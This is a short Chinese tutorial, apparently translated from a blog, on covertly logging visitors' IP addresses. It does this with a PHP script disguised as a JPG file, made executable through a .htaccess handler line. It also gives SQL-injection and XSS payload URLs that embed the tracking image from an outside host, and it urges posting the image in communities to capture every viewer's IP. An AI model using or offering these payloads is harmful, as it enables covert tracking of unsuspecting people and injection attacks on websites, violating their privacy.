在本教程中,我們將學習如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件,將jpg文件當作php文件來解析。
下面就是我們需要向.htaccess中添加的代碼:
AddHandler application/x-httpd-php5 .jpg
然後將下面的代碼復制到記事本中,命名為grabber.jpg
<?php $fh = fopen(‘ip_list.txt', ‘a'); fwrite($fh, $_SERVER[‘REMOTE_ADDR'].” “); fclose($fh); $im = imagecreatefromjpeg(“n00b.png”); header(‘Content-Type: image/jpeg'); imagejpeg($im); imagedestroy($im); ?>
將grabber.jpg的權限設置為755,然後再找一張照片,將其命名為n00b.png,接著放到與grabber.jpg相同的目錄之中。
就這樣,一切工作就緒了。當別人浏覽grabber.jpg這張照片的時候,他的ip地址就會被記錄下來。
(譯者注:需要把這些東西上傳至我們的個人網站空間中)
POC:
(譯者注:作者這裡貼了一張可獲取ip的演示照片,為了大家的隱私,我沒有將其貼出,讀者可自行去作者博客查看)
至此,我們的照片已經可以開始工作了。
接著我還想說明一下如何使用SQLi來獲取ip地址。其實使用照片來盜取ip地址十分快捷,我們沒有理由去使用SQLi這種方法,但是為了讓讀者獲取到更多的知識,我還是說明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
現在,再說一下如何使用xss來獲取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search
好了,就是這些了。
我們可以用這個技巧做許多有趣的事情,事實上大部分社區都允許我們發布一些照片,所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。
以上所述是小編給大家介紹的基於PHP實現通過照片獲取ip地址的相關內容,希望對大家有所幫助!
